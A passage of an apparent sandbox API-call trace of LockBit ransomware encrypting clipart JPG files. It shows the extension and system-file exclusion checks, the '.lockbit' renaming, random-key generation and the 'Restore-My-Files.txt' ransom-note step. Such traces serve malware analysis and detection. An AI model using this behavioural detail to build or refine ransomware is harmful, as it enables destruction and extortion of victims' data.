lpString2="J0341448.JPG") returned -1 [0158.991] lstrcmpiW (lpString1="..", lpString2="J0341448.JPG") returned -1 [0158.991] PathFindExtensionW (pszPath="J0341448.JPG") returned=".JPG" [0158.991] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0158.991] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0158.991] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0158.991] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0158.991] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0158.991] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0158.991] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0158.992] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0158.992] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0158.992] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0158.992] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0158.992] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0158.992] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0158.992] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0158.992] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0158.992] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0158.992] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0158.992] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0158.992] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0158.992] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0158.992] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0158.992] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0158.992] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0158.992] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0158.992] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.992] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0158.992] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0158.992] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0158.992] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0158.992] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0158.992] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0158.992] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0158.993] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0158.993] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0158.993] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0158.993] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0158.993] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0158.993] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0158.993] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0158.993] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0158.993] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0158.993] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0158.993] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.993] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0158.993] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0158.993] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0158.993] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0158.993] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0341448.JPG") returned 1 [0158.993] lstrcmpiW (lpString1="ntldr", lpString2="J0341448.JPG") returned 1 [0158.993] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0341448.JPG") returned 1 [0158.993] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0341448.JPG") returned -1 [0158.993] lstrcmpiW (lpString1="autorun.inf", lpString2="J0341448.JPG") returned -1 [0158.993] lstrcmpiW (lpString1="thumbs.db", lpString2="J0341448.JPG") returned 1 [0158.993] lstrcmpiW (lpString1="iconcache.db", lpString2="J0341448.JPG") returned -1 [0158.993] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.993] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341448.JPG") returned=".JPG" [0158.993] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0158.994] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0158.994] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0158.994] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0158.994] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0158.994] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0158.994] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0158.994] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0158.994] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0158.994] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0158.994] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0158.994] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0158.994] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0158.994] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0158.994] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0158.994] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0158.994] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0158.994] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0158.994] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0158.994] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0158.994] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0158.994] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0158.994] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0158.994] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0158.994] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0158.994] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0158.995] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0158.995] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0158.995] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341448.JPG.lockbit") returned 72 [0158.995] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341448.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341448.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0158.996] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.996] malloc (_Size=0x40068) returned 0x3df0008 [0158.996] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=21187) returned 1 [0158.996] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.997] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0158.997] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.997] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0158.997] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.999] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341448.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341448.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.999] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.999] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.001] free (_Block=0x1fa2ed8) [0159.001] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341448.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.001] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.001] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.001] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56772310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7457, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0341455.JPG", cAlternateFileName="")) returned 1 [0159.001] lstrcmpiW (lpString1=".", lpString2="J0341455.JPG") returned -1 [0159.001] lstrcmpiW (lpString1="..", lpString2="J0341455.JPG") returned -1 [0159.001] PathFindExtensionW (pszPath="J0341455.JPG") returned=".JPG" [0159.001] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.001] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.001] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.001] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.002] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.002] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.002] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.002] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.002] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.002] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.002] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.002] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.002] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.002] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.002] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.002] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.002] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.002] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.002] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.002] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.002] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.002] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.002] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.003] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.003] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.003] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.003] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.003] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.003] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.003] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.003] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.003] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.003] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.003] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.003] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.003] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.003] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.003] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.003] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.003] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.003] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.003] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.003] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.003] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.004] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.004] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.004] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.004] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0341455.JPG") returned 1 [0159.004] lstrcmpiW (lpString1="ntldr", lpString2="J0341455.JPG") returned 1 [0159.004] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0341455.JPG") returned 1 [0159.004] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0341455.JPG") returned -1 [0159.004] lstrcmpiW (lpString1="autorun.inf", lpString2="J0341455.JPG") returned -1 [0159.004] lstrcmpiW (lpString1="thumbs.db", lpString2="J0341455.JPG") returned 1 [0159.004] lstrcmpiW (lpString1="iconcache.db", lpString2="J0341455.JPG") returned -1 [0159.004] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.004] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341455.JPG") returned=".JPG" [0159.004] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.004] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.004] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.004] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.004] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.004] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.004] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.004] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.004] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.005] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.005] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.005] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.005] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.005] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.005] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.005] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.005] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.005] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.005] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.005] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.005] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.005] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.005] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.005] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.005] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.005] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.005] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.005] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.006] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341455.JPG.lockbit") returned 72 [0159.006] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341455.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341455.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0159.010] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.010] malloc (_Size=0x40068) returned 0x1ff1e60 [0159.010] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=29783) returned 1 [0159.010] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.011] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.011] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0159.011] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.011] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.011] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0159.011] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0159.014] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341455.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341455.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.014] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.014] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.015] free (_Block=0x1fa2ed8) [0159.015] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341455.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.015] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.015] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.016] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56772310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa9e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0341475.JPG", cAlternateFileName="")) returned 1 [0159.016] lstrcmpiW (lpString1=".", lpString2="J0341475.JPG") returned -1 [0159.016] lstrcmpiW (lpString1="..", lpString2="J0341475.JPG") returned -1 [0159.016] PathFindExtensionW (pszPath="J0341475.JPG") returned=".JPG" [0159.016] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.016] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.016] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.016] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.016] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.016] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.016] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.016] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.016] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.016] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.016] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.016] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.016] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.016] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.017] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.017] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.017] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.017] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.017] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.017] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.017] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.017] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.017] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.017] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.017] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.017] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.017] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.017] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.017] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.017] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.017] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.017] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.017] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.017] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.017] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.017] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.018] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.018] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.018] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.018] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.018] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.018] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.018] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.018] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.018] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.018] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.018] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.018] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0341475.JPG") returned 1 [0159.018] lstrcmpiW (lpString1="ntldr", lpString2="J0341475.JPG") returned 1 [0159.018] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0341475.JPG") returned 1 [0159.018] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0341475.JPG") returned -1 [0159.018] lstrcmpiW (lpString1="autorun.inf", lpString2="J0341475.JPG") returned -1 [0159.018] lstrcmpiW (lpString1="thumbs.db", lpString2="J0341475.JPG") returned 1 [0159.018] lstrcmpiW (lpString1="iconcache.db", lpString2="J0341475.JPG") returned -1 [0159.018] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.018] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341475.JPG") returned=".JPG" [0159.018] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.018] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.019] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.019] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.019] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.019] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.019] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.019] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.019] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.019] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.019] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.019] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.019] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.019] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.019] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.019] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.019] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.019] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.019] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.019] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.019] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.019] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.019] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.019] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.019] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.019] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.019] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.019] lstrcmpiW (lpString1=".tmd", 